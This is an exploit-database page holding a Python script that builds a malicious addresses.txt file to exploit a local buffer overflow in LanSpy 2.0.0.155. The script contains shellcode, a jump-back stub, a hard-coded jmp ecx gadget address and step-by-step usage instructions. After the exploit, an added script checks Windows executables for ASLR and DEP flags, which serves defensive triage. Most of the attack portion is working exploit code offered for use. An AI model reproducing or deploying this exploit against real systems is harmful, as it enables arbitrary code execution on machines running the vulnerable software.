LanSpy 2.0.0.155 - Local Buffer Overflow
Source: https://www.exploit-db.com  Author: n30m1nd  Published: 2016-10-19
#!/usr/bin/python
 
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
 
# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Tested on Win7 32bit and Win10 64 bit
 
# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR
 
# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
#   https://www.exploit-db.com/exploits/38399/
#   http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
#   the infosec community better
 
# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
#   - You can also call LanSpy.exe from the command line like the following and
#       it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe
 
# Exploit code
# ============
 
import struct
 
# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20
 
# MessageBoxA at => 00404D80
msgbox_shellcode = (
        "\x31\xC0\x50\x68"
        "\x70\x77\x6E\x64"
        "\x54\x5F\x50\x57"
        "\x57\x50\x35\xC4"
        "\x80\x80\x55\x35"
        "\x44\xCD\xC0\x55"
        "\x50\xC3"
        )
 
# WinExec at -> 004EC4FF
calc_shellcode = (
        "\x31\xC0\x50\x68"
        "\x63\x61\x6C\x63"
        "\x54\x5F\x50\x57"
        "\x35\xC3\x4E\xC3"
        "\x55\x35\x3C\x8A"
        "\x8D\x55\x50\xC3"
        )
 
# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode
 
# \x74\x80 is a two-byte short jump (0x74 = jz/je, not ja) with rel8 -0x80 = -128: measured from the
# end of the instruction it lands 126 bytes before the jump, which is where our shellcode resides
junk = 'A'*(676-126)
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")
 
# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
 
# Junk + shellcode (padded to 126 bytes) + first stage short jump back to it + address of jmp ecx
# (jmp ecx is what lands us on the first stage jump, which in turn jumps to the shellcode)
payl = junk + scde + jecx
 
# Python 2: payl is a byte string; the with-block closes the file on exit
with open("addresses.txt", "wb") as f:
        f.write(payl)
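The "Platforms" note above states that the LanSpy binary implements neither DEP nor ASLR, which is why fixed addresses such as 0x0040407D can be used. For a defender triaging whether an installed application is exposed in the same way, the relevant facts live in the PE optional header's DllCharacteristics field (DYNAMIC_BASE for ASLR, NX_COMPAT for DEP, HIGH_ENTROPY_VA and GUARD_CF as additional mitigations). The following Python script is an added example, not part of the original exploit or of LanSpy; it parses those flags from a PE image and, for offline testing, constructs minimal header-only sample images (the sample images are constructed here and are not real binaries; the field offsets and flag values follow the PE/COFF specification).

```python
#!/usr/bin/env python3
"""Report exploit-mitigation flags (ASLR, DEP, CFG, high-entropy VA) from a PE file's
DllCharacteristics field. Added example for defenders; not part of the LanSpy exploit."""
import struct
import sys

# Flag values from the PE/COFF specification (IMAGE_DLLCHARACTERISTICS_*)
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000       # Control Flow Guard


def pe_dll_characteristics(data):
    """Return the 16-bit DllCharacteristics value of a PE32 or PE32+ image held in `data`."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # Need the 4-byte signature plus the 20-byte COFF header to be in range
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    size_of_optional_header = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    if size_of_optional_header < 72 or opt + 72 > len(data):
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return struct.unpack_from("<H", data, opt + 70)[0]


def mitigation_report(data):
    """Map the DllCharacteristics flags to a small dict of booleans."""
    dc = pe_dll_characteristics(data)
    return {
        "aslr": bool(dc & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dc & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(dc & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "cfg": bool(dc & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def build_sample_image(dll_characteristics, pe32plus=False):
    """Constructed header-only PE image used for offline testing (not a runnable binary)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header right after DOS header
    opt_size = 112 if pe32plus else 96               # fields up to the data directories
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,  # Machine
                       1, 0, 0, 0,                     # sections, timestamp, symtab ptr, nsyms
                       opt_size,                       # SizeOfOptionalHeader
                       0x0102)                         # Characteristics: EXECUTABLE | 32BIT
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)  # Magic
    struct.pack_into("<H", opt, 68, 2)                            # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        # No file given: demonstrate on a constructed image with no mitigations at all
        image = build_sample_image(0x0000)
    for name, enabled in mitigation_report(image).items():
        print("%-16s %s" % (name, "yes" if enabled else "NO"))
```

A report showing `aslr NO` and `dep NO` for a 32-bit executable means fixed addresses inside the image (such as the `jmp ecx` gadget used above) are stable across runs, so the check is a quick way to rank which installed binaries deserve a closer look or a vendor update.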
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved